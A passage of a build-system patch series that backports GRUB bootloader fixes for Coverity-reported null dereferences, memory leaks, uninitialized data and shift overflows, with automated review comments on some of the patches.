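+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-unused-value.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-width.patch
+diff --git a/grub-core/lib/gnulib-patches/fix-null-state-deref.patch b/grub-core/lib/gnulib-patches/fix-null-state-deref.patch
+new file mode 100644
+index 0000000..813ec09
+--- /dev/null
++++ b/grub-core/lib/gnulib-patches/fix-null-state-deref.patch
+@@ -0,0 +1,12 @@
++--- a/lib/argp-help.c 2020-10-28 14:32:19.189215988 +0000
+++++ b/lib/argp-help.c 2020-10-28 14:38:21.204673940 +0000
++@@ -145,7 +145,8 @@
++ if (*(int *)((char *)upptr + up->uparams_offs) >= upptr->rmargin)
++ {
++ __argp_failure (state, 0, 0,
++- dgettext (state->root_argp->argp_domain,
+++ dgettext (state == NULL ? NULL
+++ : state->root_argp->argp_domain,
++ "\
++ ARGP_HELP_FMT: %s value is less than or equal to %s"),
++ "rmargin", up->name);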
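diff --git a/meta/recipes-bsp/grub/files/0011-gnulib-regexec-Fix-possible-null-dereference.patch b/meta/recipes-bsp/grub/files/0011-gnulib-regexec-Fix-possible-null-dereference.patch
new file mode 100644
index 0000000000..4f43fcf7d5
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0011-gnulib-regexec-Fix-possible-null-dereference.patch
@@ -0,0 +1,53 @@
+From 244dc2b1f518635069a556c424b2e7627f0cf036 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 5 Nov 2020 10:57:14 +0000
+Subject: [PATCH] gnulib/regexec: Fix possible null-dereference
+
+It appears to be possible that the mctx->state_log field may be NULL,
+and the name of this function, clean_state_log_if_needed(), suggests
+that it should be checking that it is valid to be cleaned before
+assuming that it does.
+
+Fixes: CID 86720
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=0b7f347638153e403ee2dd518af3ce26f4f99647]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ conf/Makefile.extra-dist | 1 +
+ .../lib/gnulib-patches/fix-regexec-null-deref.patch | 12 ++++++++++++
+ 2 files changed, 13 insertions(+)
+ create mode 100644 grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch
+
+diff --git a/conf/Makefile.extra-dist b/conf/Makefile.extra-dist
+index 96d7e69..d27d3a9 100644
+--- a/conf/Makefile.extra-dist
++++ b/conf/Makefile.extra-dist
+@@ -30,6 +30,7 @@ EXTRA_DIST += grub-core/genemuinitheader.sh
+
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-deref.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-state-deref.patch
++EXTRA_DIST += grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-unused-value.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-width.patch
+diff --git a/grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch b/grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch
+new file mode 100644
+index 0000000..db6dac9
+--- /dev/null
++++ b/grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch
+@@ -0,0 +1,12 @@
++--- a/lib/regexec.c 2020-10-21 14:25:35.310195912 +0000
+++++ b/lib/regexec.c 2020-11-05 10:55:09.621542984 +0000
++@@ -1692,6 +1692,9 @@
++ {
++ Idx top = mctx->state_log_top;
++
+++ if (mctx->state_log == NULL)
+++ return REG_NOERROR;
+++
++ if ((next_state_log_idx >= mctx->input.bufs_len
++ && mctx->input.bufs_len < mctx->input.len)
++ || (next_state_log_idx >= mctx->input.valid_len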
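diff --git a/meta/recipes-bsp/grub/files/0012-gnulib-regcomp-Fix-uninitialized-re_token.patch b/meta/recipes-bsp/grub/files/0012-gnulib-regcomp-Fix-uninitialized-re_token.patch
new file mode 100644
index 0000000000..0507e0cd66
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0012-gnulib-regcomp-Fix-uninitialized-re_token.patch
@@ -0,0 +1,55 @@
+From 512b6bb380a77233b88c84b7a712896c70281d2f Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 24 Nov 2020 18:04:22 +0000
+Subject: [PATCH] gnulib/regcomp: Fix uninitialized re_token
+
+This issue has been fixed in the latest version of gnulib, so to
+maintain consistency, I've backported that change rather than doing
+something different.
+
+Fixes: CID 73828
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=03477085f9a33789ba6cca7cd49ab9326a1baa0e]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ conf/Makefile.extra-dist | 1 +
+ .../gnulib-patches/fix-regcomp-uninit-token.patch | 15 +++++++++++++++
+ 2 files changed, 16 insertions(+)
+ create mode 100644 grub-core/lib/gnulib-patches/fix-regcomp-uninit-token.patch
+
+diff --git a/conf/Makefile.extra-dist b/conf/Makefile.extra-dist
+index d27d3a9..ffe6829 100644
+--- a/conf/Makefile.extra-dist
++++ b/conf/Makefile.extra-dist
+@@ -30,6 +30,7 @@ EXTRA_DIST += grub-core/genemuinitheader.sh
+
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-deref.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-state-deref.patch
++EXTRA_DIST += grub-core/lib/gnulib-patches/fix-regcomp-uninit-token.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-unused-value.patch
+diff --git a/grub-core/lib/gnulib-patches/fix-regcomp-uninit-token.patch b/grub-core/lib/gnulib-patches/fix-regcomp-uninit-token.patch
+new file mode 100644
+index 0000000..02e0631
+--- /dev/null
++++ b/grub-core/lib/gnulib-patches/fix-regcomp-uninit-token.patch
+@@ -0,0 +1,15 @@
++--- a/lib/regcomp.c 2020-11-24 17:06:08.159223858 +0000
+++++ b/lib/regcomp.c 2020-11-24 17:06:15.630253923 +0000
++@@ -3808,11 +3808,7 @@
++ create_tree (re_dfa_t *dfa, bin_tree_t *left, bin_tree_t *right,
++ re_token_type_t type)
++ {
++- re_token_t t;
++-#if defined GCC_LINT || defined lint
++- memset (&t, 0, sizeof t);
++-#endif
++- t.type = type;
+++ re_token_t t = { .type = type };
++ return create_token_tree (dfa, left, right, &t);
++ }
++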
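diff --git a/meta/recipes-bsp/grub/files/0013-io-lzopio-Resolve-unnecessary-self-assignment-errors.patch b/meta/recipes-bsp/grub/files/0013-io-lzopio-Resolve-unnecessary-self-assignment-errors.patch
new file mode 100644
index 0000000000..1190b0d090
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0013-io-lzopio-Resolve-unnecessary-self-assignment-errors.patch
@@ -0,0 +1,41 @@
+From c529ca446424f1a9c64f0007dfe31fa7645d13ac Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Wed, 21 Oct 2020 14:44:10 +0000
+Subject: [PATCH] io/lzopio: Resolve unnecessary self-assignment errors
+
+These 2 assignments are unnecessary since they are just assigning
+to themselves.
+
+Fixes: CID 73643
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=59666e520f44177c97b82a44c169b3b315d63b42]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/io/lzopio.c | 4 ----
+ 1 file changed, 4 deletions(-)
+
+diff --git a/grub-core/io/lzopio.c b/grub-core/io/lzopio.c
+index 3014485..a7d4425 100644
+--- a/grub-core/io/lzopio.c
++++ b/grub-core/io/lzopio.c
+@@ -125,8 +125,6 @@ read_block_header (struct grub_lzopio *lzopio)
+ sizeof (lzopio->block.ucheck)) !=
+ sizeof (lzopio->block.ucheck))
+ return -1;
+-
+- lzopio->block.ucheck = lzopio->block.ucheck;
+ }
+
+ /* Read checksum of compressed data. */
+@@ -143,8 +141,6 @@ read_block_header (struct grub_lzopio *lzopio)
+ sizeof (lzopio->block.ccheck)) !=
+ sizeof (lzopio->block.ccheck))
+ return -1;
+-
+- lzopio->block.ccheck = lzopio->block.ccheck;
+ }
+ }
+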
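diff --git a/meta/recipes-bsp/grub/files/0014-zstd-Initialize-seq_t-structure-fully.patch b/meta/recipes-bsp/grub/files/0014-zstd-Initialize-seq_t-structure-fully.patch
new file mode 100644
index 0000000000..19d881c1ca
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0014-zstd-Initialize-seq_t-structure-fully.patch
@@ -0,0 +1,34 @@
+From f55ffe6bd8b844a8cd9956702f42ac2eb96ad56f Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 5 Nov 2020 10:29:59 +0000
+Subject: [PATCH] zstd: Initialize seq_t structure fully
+
+While many compilers will initialize this to zero, not all will, so it
+is better to be sure that fields not being explicitly set are at known
+values, and there is code that checks this fields value elsewhere in the
+code.
+
+Fixes: CID 292440
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=2777cf4466719921dbe4b30af358a75e7d76f217]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/lib/zstd/zstd_decompress.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/lib/zstd/zstd_decompress.c b/grub-core/lib/zstd/zstd_decompress.c
+index 711b5b6..e4b5670 100644
+--- a/grub-core/lib/zstd/zstd_decompress.c
++++ b/grub-core/lib/zstd/zstd_decompress.c
+@@ -1325,7 +1325,7 @@ typedef enum { ZSTD_lo_isRegularOffset, ZSTD_lo_isLongOffset=1 } ZSTD_longOffset
+ FORCE_INLINE_TEMPLATE seq_t
+ ZSTD_decodeSequence(seqState_t* seqState, const ZSTD_longOffset_e longOffsets)
+ {
+- seq_t seq;
++ seq_t seq = {0};
+ U32 const llBits = seqState->stateLL.table[seqState->stateLL.state].nbAdditionalBits;
+ U32 const mlBits = seqState->stateML.table[seqState->stateML.state].nbAdditionalBits;
+ U32 const ofBits = seqState->stateOffb.table[seqState->stateOffb.state].nbAdditionalBits;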
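diff --git a/meta/recipes-bsp/grub/files/0015-kern-partition-Check-for-NULL-before-dereferencing-i.patch b/meta/recipes-bsp/grub/files/0015-kern-partition-Check-for-NULL-before-dereferencing-i.patch
new file mode 100644
index 0000000000..af9fcd45cc
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0015-kern-partition-Check-for-NULL-before-dereferencing-i.patch
@@ -0,0 +1,43 @@
+From 0da8ef2e03a8591586b53a29af92d2ace76a04e3 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 23 Oct 2020 09:49:59 +0000
+Subject: [PATCH] kern/partition: Check for NULL before dereferencing input
+ string
+
+There is the possibility that the value of str comes from an external
+source and continuing to use it before ever checking its validity is
+wrong. So, needs fixing.
+
+Additionally, drop unneeded part initialization.
+
+Fixes: CID 292444
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=bc9c468a2ce84bc767234eec888b71f1bc744fff]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/partition.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/kern/partition.c b/grub-core/kern/partition.c
+index e499147..b10a184 100644
+--- a/grub-core/kern/partition.c
++++ b/grub-core/kern/partition.c
+@@ -109,11 +109,14 @@ grub_partition_map_probe (const grub_partition_map_t partmap,
+ grub_partition_t
+ grub_partition_probe (struct grub_disk *disk, const char *str)
+ {
+- grub_partition_t part = 0;
++ grub_partition_t part;
+ grub_partition_t curpart = 0;
+ grub_partition_t tail;
+ const char *ptr;
+
++ if (str == NULL)
++ return 0;
++
+ part = tail = disk->partition;
+
+ for (ptr = str; *ptr;)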
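diff --git a/meta/recipes-bsp/grub/files/0016-disk-ldm-Make-sure-comp-data-is-freed-before-exiting.patch b/meta/recipes-bsp/grub/files/0016-disk-ldm-Make-sure-comp-data-is-freed-before-exiting.patch
new file mode 100644
index 0000000000..c1687c75d0
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0016-disk-ldm-Make-sure-comp-data-is-freed-before-exiting.patch
@@ -0,0 +1,128 @@
+From 0c5d0fd796e6cafba179321de396681a493c4158 Mon Sep 17 00:00:00 2001
+From: Marco A Benatto <mbenatto@redhat.com>
+Date: Mon, 7 Dec 2020 11:53:03 -0300
+Subject: [PATCH] disk/ldm: Make sure comp data is freed before exiting from
+ make_vg()
+
+Several error handling paths in make_vg() do not free comp data before
+jumping to fail2 label and returning from the function. This will leak
+memory. So, let's fix all issues of that kind.
+
+Fixes: CID 73804
+
+Signed-off-by: Marco A Benatto <mbenatto@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=23e39f50ca7a107f6b66396ed4d177a914dee035]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/disk/ldm.c | 51 ++++++++++++++++++++++++++++++++++++++------
+ 1 file changed, 44 insertions(+), 7 deletions(-)
+
+diff --git a/grub-core/disk/ldm.c b/grub-core/disk/ldm.c
+index 58f8a53..428415f 100644
+--- a/grub-core/disk/ldm.c
++++ b/grub-core/disk/ldm.c
+@@ -554,7 +554,11 @@ make_vg (grub_disk_t disk,
+ comp->segments = grub_calloc (comp->segment_alloc,
+ sizeof (*comp->segments));
+ if (!comp->segments)
+- goto fail2;
++ {
++ grub_free (comp->internal_id);
++ grub_free (comp);
++ goto fail2;
++ }
+ }
+ else
+ {
+@@ -562,7 +566,11 @@ make_vg (grub_disk_t disk,
+ comp->segment_count = 1;
+ comp->segments = grub_malloc (sizeof (*comp->segments));
+ if (!comp->segments)
+- goto fail2;
++ {
++ grub_free (comp->internal_id);
++ grub_free (comp);
++ goto fail2;
++ }
+ comp->segments->start_extent = 0;
+ comp->segments->extent_count = lv->size;
+ comp->segments->layout = 0;
+@@ -574,15 +582,26 @@ make_vg (grub_disk_t disk,
+ comp->segments->layout = GRUB_RAID_LAYOUT_SYMMETRIC_MASK;
+ }
+ else
+- goto fail2;
++ {
++ grub_free (comp->segments);
++ grub_free (comp->internal_id);
++ grub_free (comp);
++ goto fail2;
++ }
+ ptr += *ptr + 1;
+ ptr++;
+ if (!(vblk[i].flags & 0x10))
+- goto fail2;
++ {
++ grub_free (comp->segments);
++ grub_free (comp->internal_id);
++ grub_free (comp);
++ goto fail2;
++ }
+ if (ptr >= vblk[i].dynamic + sizeof (vblk[i].dynamic)
+ || ptr + *ptr + 1 >= vblk[i].dynamic
+ + sizeof (vblk[i].dynamic))
+ {
++ grub_free (comp->segments);
+ grub_free (comp->internal_id);
+ grub_free (comp);
+ goto fail2;
+@@ -592,6 +611,7 @@ make_vg (grub_disk_t disk,
+ if (ptr + *ptr + 1 >= vblk[i].dynamic
+ + sizeof (vblk[i].dynamic))
+ {
++ grub_free (comp->segments);
+ grub_free (comp->internal_id);
+ grub_free (comp);
+ goto fail2;
+@@ -601,7 +621,12 @@ make_vg (grub_disk_t disk,
+ comp->segments->nodes = grub_calloc (comp->segments->node_alloc,
+ sizeof (*comp->segments->nodes));
+ if (!lv->segments->nodes)
+- goto fail2;
++ {
++ grub_free (comp->segments);
++ grub_free (comp->internal_id);
++ grub_free (comp);
++ goto fail2;
++ }
+ }
+
+ if (lv->segments->node_alloc == lv->segments->node_count)
+@@ -611,11 +636,23 @@ make_vg (grub_disk_t disk,
+
+ if (grub_mul (lv->segments->node_alloc, 2, &lv->segments->node_alloc) ||
+ grub_mul (lv->segments->node_alloc, sizeof (*lv->segments->nodes), &sz))
+- goto fail2;
++ {
++ grub_free (comp->segments->nodes);
++ grub_free (comp->segments);
++ grub_free (comp->internal_id);
++ grub_free (comp);
++ goto fail2;
++ }
+
+ t = grub_realloc (lv->segments->nodes, sz);
+ if (!t)
+- goto fail2;
++ {
++ grub_free (comp->segments->nodes);
++ grub_free (comp->segments);
++ grub_free (comp->internal_id);
++ grub_free (comp);
++ goto fail2;
++ }
+ lv->segments->nodes = t;
+ }
+ lv->segments->nodes[lv->segments->node_count].pv = 0;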
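Review bot: The allocation check kept as context in the `@@ -601,7 +621,12 @@` hunk tests the wrong pointer: the `grub_calloc` result is stored in `comp->segments->nodes`, but the condition is `if (!lv->segments->nodes)`, so a failed allocation of the component's node array goes undetected and the new cleanup block does not run for it. The condition should read `if (!comp->segments->nodes)`. Separately, the same cleanup sequence is now repeated across these hunks; one label that frees `comp->segments`, `comp->internal_id` and `comp` before falling into `fail2` would make a missed free harder to introduce. make_vg starts and ends outside these hunks, so what `fail2` itself releases is not visible here.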
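diff --git a/meta/recipes-bsp/grub/files/0017-disk-ldm-If-failed-then-free-vg-variable-too.patch b/meta/recipes-bsp/grub/files/0017-disk-ldm-If-failed-then-free-vg-variable-too.patch
new file mode 100644
index 0000000000..ecdb230f76
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0017-disk-ldm-If-failed-then-free-vg-variable-too.patch
@@ -0,0 +1,28 @@
+From 253485e8df3c9dedac848567e638157530184295 Mon Sep 17 00:00:00 2001
+From: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
+Date: Mon, 7 Dec 2020 10:07:47 -0300
+Subject: [PATCH] disk/ldm: If failed then free vg variable too
+
+Fixes: CID 73809
+
+Signed-off-by: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=e0b83df5da538d2a38f770e60817b3a4b9d5b4d7]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/disk/ldm.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/grub-core/disk/ldm.c b/grub-core/disk/ldm.c
+index 428415f..54713f4 100644
+--- a/grub-core/disk/ldm.c
++++ b/grub-core/disk/ldm.c
+@@ -199,6 +199,7 @@ make_vg (grub_disk_t disk,
+ {
+ grub_free (vg->uuid);
+ grub_free (vg->name);
++ grub_free (vg);
+ return NULL;
+ }
+ grub_memcpy (vg->uuid, label->group_guid, LDM_GUID_STRLEN);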
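diff --git a/meta/recipes-bsp/grub/files/0018-disk-ldm-Fix-memory-leak-on-uninserted-lv-references.patch b/meta/recipes-bsp/grub/files/0018-disk-ldm-Fix-memory-leak-on-uninserted-lv-references.patch
new file mode 100644
index 0000000000..26932f674c
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0018-disk-ldm-Fix-memory-leak-on-uninserted-lv-references.patch
@@ -0,0 +1,50 @@
+From 3e1d2f1959acbe5152cdd5818d495f6455d1a158 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 8 Dec 2020 10:00:51 +0000
+Subject: [PATCH] disk/ldm: Fix memory leak on uninserted lv references
+
+The problem here is that the memory allocated to the variable lv is not
+yet inserted into the list that is being processed at the label fail2.
+
+As we can already see at line 342, which correctly frees lv before going
+to fail2, we should also be doing that at these earlier jumps to fail2.
+
+Fixes: CID 73824
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=156c281a1625dc73fd350530630c6f2d5673d4f6]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/disk/ldm.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/grub-core/disk/ldm.c b/grub-core/disk/ldm.c
+index 54713f4..e82e989 100644
+--- a/grub-core/disk/ldm.c
++++ b/grub-core/disk/ldm.c
+@@ -321,7 +321,10 @@ make_vg (grub_disk_t disk,
+ lv->visible = 1;
+ lv->segments = grub_zalloc (sizeof (*lv->segments));
+ if (!lv->segments)
+- goto fail2;
++ {
++ grub_free (lv);
++ goto fail2;
++ }
+ lv->segments->start_extent = 0;
+ lv->segments->type = GRUB_DISKFILTER_MIRROR;
+ lv->segments->node_count = 0;
+@@ -329,7 +332,10 @@ make_vg (grub_disk_t disk,
+ lv->segments->nodes = grub_calloc (lv->segments->node_alloc,
+ sizeof (*lv->segments->nodes));
+ if (!lv->segments->nodes)
+- goto fail2;
++ {
++ grub_free (lv);
++ goto fail2;
++ }
+ ptr = vblk[i].dynamic;
+ if (ptr + *ptr + 1 >= vblk[i].dynamic
+ + sizeof (vblk[i].dynamic))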
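Review bot: The second added block still leaks `lv->segments`: it is reached only after `lv->segments = grub_zalloc (...)` succeeded, yet the failure path for `lv->segments->nodes` frees `lv` alone. Add `grub_free (lv->segments);` before `grub_free (lv);` in that block. Any other members of `lv` allocated earlier in make_vg would need the same treatment; the start of the function is outside the hunk, so compare with the free sequence the commit message refers to at line 342.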
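diff --git a/meta/recipes-bsp/grub/files/0019-disk-cryptodisk-Fix-potential-integer-overflow.patch b/meta/recipes-bsp/grub/files/0019-disk-cryptodisk-Fix-potential-integer-overflow.patch
new file mode 100644
index 0000000000..dd7fda357d
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0019-disk-cryptodisk-Fix-potential-integer-overflow.patch
@@ -0,0 +1,50 @@
+From 2550aaa0c23fdf8b6c54e00c6b838f2e3aa81fe2 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 21 Jan 2021 11:38:31 +0000
+Subject: [PATCH] disk/cryptodisk: Fix potential integer overflow
+
+The encrypt and decrypt functions expect a grub_size_t. So, we need to
+ensure that the constant bit shift is using grub_size_t rather than
+unsigned int when it is performing the shift.
+
+Fixes: CID 307788
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=a201ad17caa430aa710654fdf2e6ab4c8166f031]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/disk/cryptodisk.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/disk/cryptodisk.c b/grub-core/disk/cryptodisk.c
+index 5037768..6883f48 100644
+--- a/grub-core/disk/cryptodisk.c
++++ b/grub-core/disk/cryptodisk.c
+@@ -311,10 +311,10 @@ grub_cryptodisk_endecrypt (struct grub_cryptodisk *dev,
+ case GRUB_CRYPTODISK_MODE_CBC:
+ if (do_encrypt)
+ err = grub_crypto_cbc_encrypt (dev->cipher, data + i, data + i,
+- (1U << dev->log_sector_size), iv);
++ ((grub_size_t) 1 << dev->log_sector_size), iv);
+ else
+ err = grub_crypto_cbc_decrypt (dev->cipher, data + i, data + i,
+- (1U << dev->log_sector_size), iv);
++ ((grub_size_t) 1 << dev->log_sector_size), iv);
+ if (err)
+ return err;
+ break;
+@@ -322,10 +322,10 @@ grub_cryptodisk_endecrypt (struct grub_cryptodisk *dev,
+ case GRUB_CRYPTODISK_MODE_PCBC:
+ if (do_encrypt)
+ err = grub_crypto_pcbc_encrypt (dev->cipher, data + i, data + i,
+- (1U << dev->log_sector_size), iv);
++ ((grub_size_t) 1 << dev->log_sector_size), iv);
+ else
+ err = grub_crypto_pcbc_decrypt (dev->cipher, data + i, data + i,
+- (1U << dev->log_sector_size), iv);
++ ((grub_size_t) 1 << dev->log_sector_size), iv);
+ if (err)
+ return err;
+ break;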
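Review bot: Casting the constant to `grub_size_t` widens the shift, but nothing in these hunks bounds `dev->log_sector_size`, and a shift count at or above the width of the type is still undefined. If that field can be set from on-disk header data, it should be range-checked where it is assigned, which is outside this hunk and needs confirming. The expression `((grub_size_t) 1 << dev->log_sector_size)` is also repeated four times; computing it once into a local before the `switch` would keep the four call sites in step.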
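diff --git a/meta/recipes-bsp/grub/files/0020-hfsplus-Check-that-the-volume-name-length-is-valid.patch b/meta/recipes-bsp/grub/files/0020-hfsplus-Check-that-the-volume-name-length-is-valid.patch
new file mode 100644
index 0000000000..eb459c547f
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0020-hfsplus-Check-that-the-volume-name-length-is-valid.patch
@@ -0,0 +1,43 @@
+From 7c1813eeec78892fa651046cc224ae4e80d0c94d Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 23 Oct 2020 17:09:31 +0000
+Subject: [PATCH] hfsplus: Check that the volume name length is valid
+
+HFS+ documentation suggests that the maximum filename and volume name is
+255 Unicode characters in length.
+
+So, when converting from big-endian to little-endian, we should ensure
+that the name of the volume has a length that is between 0 and 255,
+inclusive.
+
+Fixes: CID 73641
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=2298f6e0d951251bb9ca97d891d1bc8b74515f8c]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/fs/hfsplus.c | 9 +++++++++
+ 1 file changed, 9 insertions(+)
+
+diff --git a/grub-core/fs/hfsplus.c b/grub-core/fs/hfsplus.c
+index dae43be..03c3c4c 100644
+--- a/grub-core/fs/hfsplus.c
++++ b/grub-core/fs/hfsplus.c
+@@ -1007,6 +1007,15 @@ grub_hfsplus_label (grub_device_t device, char **label)
+ grub_hfsplus_btree_recptr (&data->catalog_tree, node, ptr);
+
+ label_len = grub_be_to_cpu16 (catkey->namelen);
++
++ /* Ensure that the length is >= 0. */
++ if (label_len < 0)
++ label_len = 0;
++
++ /* Ensure label length is at most 255 Unicode characters. */
++ if (label_len > 255)
++ label_len = 255;
++
+ label_name = grub_calloc (label_len, sizeof (*label_name));
+ if (!label_name)
+ {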
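Review bot: An out-of-range `catkey->namelen` is silently clamped rather than treated as corruption, so a malformed catalog key still yields a label built from whatever follows it. Returning an error through `grub_error (GRUB_ERR_BAD_FS, ...)` when `label_len > 255` would be the safer response, provided the buffers allocated earlier in grub_hfsplus_label (outside the hunk) are released on that path. The `label_len < 0` test looks unreachable if `grub_be_to_cpu16` yields an unsigned 16-bit value and `label_len` is wider than 16 bits; its declaration is outside the hunk, so confirm before dropping it. The clamp also does not establish that 255 name units of `catkey->name` lie inside the record that was read.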
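diff --git a/meta/recipes-bsp/grub/files/0021-zfs-Fix-possible-negative-shift-operation.patch b/meta/recipes-bsp/grub/files/0021-zfs-Fix-possible-negative-shift-operation.patch
new file mode 100644
index 0000000000..12418858f9
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0021-zfs-Fix-possible-negative-shift-operation.patch
@@ -0,0 +1,42 @@
+From c757779e5d09719666c3b155afd2421978a107bd Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 24 Nov 2020 16:41:49 +0000
+Subject: [PATCH] zfs: Fix possible negative shift operation
+
+While it is possible for the return value from zfs_log2() to be zero
+(0), it is quite unlikely, given that the previous assignment to blksz
+is shifted up by SPA_MINBLOCKSHIFT (9) before 9 is subtracted at the
+assignment to epbs.
+
+But, while unlikely during a normal operation, it may be that a carefully
+crafted ZFS filesystem could result in a zero (0) value to the
+dn_datalbkszsec field, which means that the shift left does nothing
+and assigns zero (0) to blksz, resulting in a negative epbs value.
+
+Fixes: CID 73608
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=a02091834d3e167320d8a262ff04b8e83c5e616d]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/fs/zfs/zfs.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/grub-core/fs/zfs/zfs.c b/grub-core/fs/zfs/zfs.c
+index 36d0373..0c42cba 100644
+--- a/grub-core/fs/zfs/zfs.c
++++ b/grub-core/fs/zfs/zfs.c
+@@ -2667,6 +2667,11 @@ dnode_get (dnode_end_t * mdn, grub_uint64_t objnum, grub_uint8_t type,
+ blksz = grub_zfs_to_cpu16 (mdn->dn.dn_datablkszsec,
+ mdn->endian) << SPA_MINBLOCKSHIFT;
+ epbs = zfs_log2 (blksz) - DNODE_SHIFT;
++
++ /* While this should never happen, we should check that epbs is not negative. */
++ if (epbs < 0)
++ epbs = 0;
++
+ blkid = objnum >> epbs;
+ idx = objnum & ((1 << epbs) - 1);
+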
